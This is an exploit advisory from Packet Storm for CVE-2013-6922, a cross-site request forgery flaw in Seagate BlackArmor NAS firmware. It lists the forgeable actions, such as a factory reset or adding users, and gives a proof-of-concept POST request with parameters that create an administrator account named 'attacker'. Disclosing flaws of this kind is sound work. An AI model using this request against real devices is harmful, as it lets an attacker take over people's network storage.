Seagate BlackArmor NAS sg2000-2000.1331 Cross Site Request Forgery

2014-01-06T00:00:00
ID PACKETSTORM:124686
Type packetstorm
Reporter Jeroen
Modified 2014-01-06T00:00:00

Description

                                        
                                            `# Exploit Title: Seagate BlackArmor NAS - Cross Site Request Forgery  
  
# Google Dork: N/A  
  
# Date: 04-01-2014  
  
# Exploit Author: Jeroen - IT Nerdbox  
  
# Vendor Homepage: http://www.seagate.com/  
  
# Software Link:  
http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/  
  
# Version: sg2000-2000.1331  
  
# Tested on: N/A  
  
# CVE : CVE-2013-6922  
  
#  
  
## Description:  
  
#  
  
# There are multiple CSRF attacks possible, the proof of concept shows how  
it is possible to add  
  
# a user with administrative privileges to the system.  
#  
# It is also possible to:  
  
#  
  
# 1. Factory reset the device  
  
# 2. Reboot the device  
  
# 3. Add/Edit/Remove users  
# 4. Add/Edit/Remove shares and volumes  
  
#  
# This vulnerability was reported to Seagate in September 2013, they stated  
that this will not be fixed.  
  
#  
  
## Proof of Concept:  
  
#  
  
# POST: http(s)://<url |  
ip>/admin/access_control_user_add.php?lang=en&gi=a001&fbt=23  
# Parameters:  
  
#  
  
# username attacker  
# adminright yes  
# fullname hacker  
# userpasswd attackers_password  
# userpasswdcheck attackers_password  
  
`